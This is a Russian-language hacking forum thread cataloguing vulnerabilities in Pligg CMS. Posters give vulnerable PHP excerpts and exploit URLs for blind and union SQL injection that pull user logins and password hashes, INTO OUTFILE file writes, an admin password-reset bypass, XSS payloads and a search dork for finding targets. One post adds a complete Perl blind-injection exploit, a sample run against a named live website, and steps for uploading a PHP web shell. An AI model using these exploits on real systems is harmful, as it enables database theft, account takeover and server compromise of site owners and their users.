Обзор уязвимостей Pligg

Discussion in 'Веб-уязвимости' started by AFoST, 29 Jun 2009.

  1. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Продукт:
    Pligg Content Management System
    Beta 9.8
    09.08.2007
    Homepage: http://www.pligg.com​
    Дорк:
    Powered By Pligg​

    Blind SQL-injection
    magic_quotes = off
    /out.php
    PHP:
    ------------------------
    ...
    requestID $_REQUEST['id'];
    $requestTitle $_REQUEST['title'];
    $requestURL $_REQUEST['url'];

    if(isset(
    $requestTitle)){
        
    $requestID $db->get_var("SELECT link_id FROM " table_links " WHERE `link_title_url` = '$requestTitle';");
    }

    if(isset(
    $requestURL)){
        
    $requestID $db->get_var("SELECT link_id FROM " table_links " WHERE `link_url` = '$requestURL';");
    }

    if(
    is_numeric($requestID)) {
    ...
    ------------------------
    exploit:
    http://pligg/out.php?title=' union select if(true,1,null) -- -
    http://pligg/out.php?title=' union select if(false,1,null) -- -​
    example:
    exploit:
    http://pligg/out.php?url=' union select if(true,1,null) -- -
    http://pligg/out.php?url=' union select if(false,1,null) -- -​
    example:
    Blind SQL-injection
    register_globals = on
    /userrss.php
    PHP:
    ------------------------
    ...
    if(isset(
    $_REQUEST['user'])){$login $_REQUEST['user'];}
    $user=new User();
    $user->username $login;
    if(!
    $user->read()) {
        echo 
    "error: user does not exist";
        die;
    }
    ...
    if(!empty(
    $_REQUEST['rows'])) 
        
    $rows $_REQUEST['rows'];
    else 
    $rows 40;
    ...
        if(!empty(
    $_REQUEST['status'])) {
            
    $status $_REQUEST['status'];
        } else {
            
    // By default it searches on all
            
    if($search$status 'all';
            else 
    $status 'all';
        }    
        
        switch (
    $status) {
            case 
    'published':
                
    $order_field 'link_published_date';
                
    $link_date 'published_date';
                
    $title $main_smarty->get_config_vars("PLIGG_Visual_Published_News");
                
    $from_where "FROM " table_links " WHERE link_status='published' ";
                break;
            case 
    'queued':
    ...        case
    ...        case
    ...        }
        
    $from_where .= " AND link_author=$user->id "//вот тут можно дописать кусок скул-запроса.
        
        
    $order_by " ORDER BY $order_field DESC ";
        
    $last_modified $db->get_var("SELECT UNIX_TIMESTAMP(max($order_field)) links $from_where");
        
    $sql "SELECT DISTINCT link_id $from_where $order_by LIMIT $rows";
    ------------------------
    exploit
    http://pligg/userrss.php?user=god&rows=5&status=1&order_field=link_date&from_where=from pligg_links where link_id=1 and true -- -
    http://pligg/userrss.php?user=god&rows=5&status=1&order_field=link_date&from_where=from pligg_links where link_id=1 and false -- -​
    example
    Blind SQL-injection
    magic_quotes_gpc = off
    /login.php
    PHP:
    ------------------------
    ...
        if(
    $_POST["processlogin"] == 3) { // if user requests forgotten password
            
    $username trim($_POST['username']);
            if(
    strlen($username) == 0){
                
    $errorMsg $main_smarty->get_config_vars("PLIGG_Visual_Login_Forgot_Error");
            }
            else {
                
    $user $db->get_row("SELECT * FROM `" table_users "` where `user_login` = '".$username."'");
                if(
    $user){
                    
    $salt substr(md5(uniqid(rand(), true)), 0SALT_LENGTH);
    ...
    ------------------------    
    exploit:
    POST:http://pligg/login.php?processlogin=3&username=root' or false -- -
    POST:http://pligg/login.php?processlogin=3&username=root' or true -- -

    if file_priv=Y
    /login.php?processlogin=3&username=root' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 into outfile '/path/pligg.txt' -- -​
    Blind SQL-injection
    magic_quotes = off
    /story.php
    PHP:
    -------------------------
    ...
    if(isset(
    $_REQUEST['title'])){$requestTitle strip_tags($_REQUEST['title']);}
    ...
    if(isset(
    $requestTitle)){
        
    $tmp "SELECT link_id FROM " table_links " WHERE `link_title_url` = '$requestTitle';";
        
    $requestID $db->get_var($tmp);
        }
    ...
    -------------------------
    exploit:
    http://pligg/story.php?title=существующий title' and (substring(version(),1,1))>1-- -​
    example:
    Blind SQL-injection
    /editlink.php
    PHP:
    -------------------------
    ...
    if(isset(
    $_GET['id'])){
        
    $theid strip_tags($_GET['id']);
    }
    if(isset(
    $_POST['id'])){
        
    $theid strip_tags($_POST['id']);
    }
    ...
    $link $db->get_row("SELECT link_id, link_author FROM " table_links " WHERE link_id=".$theid.";");
    if (
    $link) {
        if (
    $link->link_author==$current_user->user_id || $current_user->user_level == "admin" || $current_user->user_level == "god")
        {
    ...
    -------------------------
    exploit
    http://pligg/editlink.php?id=-1 union select 1,if(true,'god',1)-- -
    http://pligg/editlink.php?id=-1 union select 1,if(false,'god',1)-- -

    if file_priv=Y
    http://pligg/editlink.php?id=-1 union select 1,2 into outfile 'c:/pligg.txt'-- -​
    example:
    (c) AFoST
     
    2 people like this.
  2. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    AFoST, в версии 1.0.0. все Blind'и не работают)
    т.е. разработчики добавили ф-цию "антихак" sanitize(, и теперь код уже выглядит уже так%
    PHP:
    $requestID sanitize($_REQUEST['id'], 3);
    $requestTitle sanitize($_REQUEST['title'], 3);
    $requestURL sanitize($_REQUEST['url'], 3);

    Pligg 1.0.0

    pXSS
    /register_complete.php
    PHP:
    $user=$_GET['user'];

    $usr = new User();
    $usr->username $user;
    if (
    $usr->read()){
        
    $email $usr->email;
    }
    exploit:
    Code:
    /register_complete.php?user=a<script>alert(/xss/);</script>
    example:
    Code:
    http://www.gossipsnipper.com/register_complete.php?user=a<script>alert(/xss/);</script>
    Full path disclosure
    Code:
    /install/header.php
    /install/install0.php
    /install/troubleshooter.php
    /install/install1.php
    /install/menu.php
    /libs/backup/mysql_backup/backup.php
    /libs/backup/mysql_backup/init.php
     
    #2 eLWAux, 29 Jun 2009
    Last edited: 29 Jun 2009
    1 person likes this.
  3. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Full path disclosure
    /Config_File.class.php
    /Smarty_Compiler.class.php
    /Smarty_Test.class.php
    /class.compiler.php
    /podcast.php
    /settings.php​
    Directory listing
    при удачном htaccess
    http://pligg/cache/
    http://pligg/internal/
    http://pligg/evb/
    http://pligg/libs/
    http://pligg/modules/
    http://pligg/plugins/
    http://pligg/templates/
    http://pligg/templates_c/​
     
  4. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Она и в той версии был) но не везде =)
    В этом двиге тот самый интересный Сцукокод на смену админского пароля)) Докрутить б...
     
  5. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    User password reset to "password"

    Спасибо Gifts за помощь

    PHP:
        if($_GET["processlogin"] == 4) { // if user clicks on the forgotten password confirmation code
            
    $username trim($_GET['username']);
            if(
    strlen($username) == 0){
                
    $errorMsg $main_smarty->get_config_vars("PLIGG_Visual_Login_Forgot_Error");
            }
            else {
                
    $confirmationcode $_GET["confirmationcode"];
                
    $DBconf $db->get_var("SELECT `last_reset_code` FROM `" table_users "` where `user_login` = '".$username."'");
                if(
    $DBconf){
                    if(
    $DBconf == $confirmationcode && !empty($confirmationcode)){
                        
    $db->query('UPDATE `' table_users '` SET `last_reset_code` = "" WHERE `user_login` = "'.$username.'"');
                        
    $db->query('UPDATE `' table_users '` SET `user_pass` = "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login` = "'.$username.'"');
                        
    $errorMsg $main_smarty->get_config_vars('PLIGG_Visual_Login_Forgot_PassReset');
    exploit:
    /login.php?processlogin=4&username=" or user_login = "god" /*' and 1=0 UNION select 123/*&confirmationcode=123​
     
    1 person likes this.
  6. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    Version: 1.0.1 (возможно более ранние версии)
    Default table prefix: pligg_

    SQL Injection

    Vuln file: /libs/search.php
    кода довольно много, приводить не буду

    Exploit:
    Code:
    http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/search.php?search=paxek&slink=1&scategory=1[COLOR=White])+union+select+(select+concat(0x3c62723e,user_login,0x3a,user_pass,0x3c62723e)+from+[/COLOR][COLOR=Red][prefix][/COLOR][COLOR=White]users+where+user_id=1),null,null--+&adv=1[/COLOR]
    Version: 1.0.3 (последняя на данный момент)

    Blind SQL Injection

    Vuln file: /libs/search.php
    Exploit:
    Code:
    http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/search.php?search=[COLOR=Red][search_keywords][/COLOR]&slink=1&scategory=1[COLOR=Red][inj][/COLOR]&adv=1
    Вывода как в версии 1.0.1 не получилось добиться, т.к по дефолту в конфиге "error_reporting(E_ERROR)", поэтому крутим как blind.
    Написал эксплойт под это дело.
    Code:
    #!/usr/bin/perl
    
    use LWP;
    use Fcntl;
    
    $title = "
    
    [*]=====================================[*]
    !                                         !
    !  Pligg CMS Blind SQL Injection Exploit  !
    !                                         !
    !            Found && coded by RulleR     !
    !                         Antichat.ru     !
    !                                         !
    
    [*]=====================================[*]
    ";
    print $title;
    print "\n[+] Enter Host: ";
    chop ($host = <>);
    print "\n[+] Enter Search Keywords: ";
    chop ($searchkey = <>);
    print "\n[+] Enter \"scategory\": ";
    chop ($scat = <>);
    print "\n[>] Exploiting started... $host\n\n";
    print "    Please wait...\n\n";
    
    #________________ CONFIG _______________
    
    $regexp = '<a href=.*>'.$searchkey;
    $length = 100;
    $column = 'user_login';#concat_ws(0x3a,user_login,user_pass)
    $prefix = 'pligg_';
    $table = 'users';
    $user_id = 1;
    $filename = 'Pligg_exp_result.txt';
    #_______________________________________
    
    XEK: for ($start = 1; $start <= $length; $start++) {
             $min = 0;$max = 255;
             while(1) {		     
    	         $x = int(($max - $min)/2 + $min);
    			 if (&WebGet($host,$start,$x) =~ /$regexp/) {
    			     $min = $x;
    			 }
    			 else {
    				 $max = $x;
    			 }
    			 last XEK if ($max == 1);
    			 if ($max - $min == 1) {
    			     $char = chr($max);			     
    			     push (@res, $char);
    			     print @res,"\n";last;				 
    			 }
    			 
    		 }
    	 }
    
    print "\n[!] Exploiting finished :)\n\n";
    print "---------------------- [Result] ----------------------\n";
    print @res,"\n";
    print "------------------------------------------------------\n";
    
    sysopen (RESULT, $filename, O_WRONLY | O_CREAT);
    print RESULT $title;
    print RESULT "\n---------------------- [Result] ----------------------\n";
    print RESULT @res; 
    print RESULT "\n------------------------------------------------------\n";
    close (RESULT);
    print "\nResult saving in $filename\n";
    
    sub WebGet() {
    	 $inj = '/search.php?search='.$searchkey.'&slink=1&scategory='.$scat.'+and+ord(substr((select+'.$column.'+from+'.$prefix.$table.'+where+user_id='.$user_id.'),'.$_[1].',1))>'.$_[2].'&adv=1';	 
    	 $request = HTTP::Request->new(GET => $_[0].$inj);
    	 $u_a = LWP::UserAgent->new();
    	 $u_a->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    	 $u_a->timeout(10);
    	 $response = $u_a->request($request);
    	 if ($response->is_error) {
    	     print " ! Error: ".$response->status_line.".\n"; die " :(\n";
    	 }
         return $response->content;
    }
    
    или берем с pastebin.com
    Пример работы (получение login'а админа):
    Code:
    D:\\$_W3b-x3q\cms_all>pligg_exp.pl
    
    [*]=====================================[*]
    !                                         !
    !  Pligg CMS Blind SQL Injection Exploit  !
    !                                         !
    !            Found && coded by RulleR     !
    !                                         !
    
    [*]=====================================[*]
    
    [+] Enter Host: http://doanhnhanso.com/news
    
    [+] Enter Search Keywords: Online
    
    [+] Enter "scategory": 6
    
    [>] Exploiting started... http://doanhnhanso.com/news
    
        Please wait...
    
    d
    do
    doa
    doan
    doanh
    doanhn
    doanhnh
    doanhnha
    doanhnhan
    doanhnhans
    doanhnhanso
    
    [!] Exploiting finished :)
    
    ---------------------- [Result] ----------------------
    doanhnhanso
    ------------------------------------------------------
    
    Result saving in Pligg_exp_result.txt
    Passive XSS
    Exploit:
    Code:
    http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/search.php?search=[COLOR=White]</title><script>alert(1)</script>[/COLOR]
    
    http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/search.php[COLOR=White]?"><script>alert(1)</script>[/COLOR]
    ------------------------------------------------------------
    [COLOR=PaleGreen]Need:[/COLOR] register_globals = [B]ON[/B]
    http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/advancedsearch.php?category_option=[COLOR=White]<script>alert(1)</script>[/COLOR]
    Upload shell
    Need:admin account

    Admin --> Modules
    Устанавливаем модуль Upload (по дефолту не установлен), включаем модуль (кликаем Disable).
    Далее переходим в Settings --> General Settings
    в Allowed File Type дописываем расширение php.
    Добавляем новость и прикрепляем шелл. Шелл будет в /modules/upload/attachments/[name_shell].php
     
    #6 RulleR, 17 Jan 2010
    Last edited: 27 Jan 2010
    5 people like this.
  7. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    RulleR, даже если вывода через ошибку нет, всё равно в сплоитах стоит использовать бинарный поиск, как минимум.
     
    1 person likes this.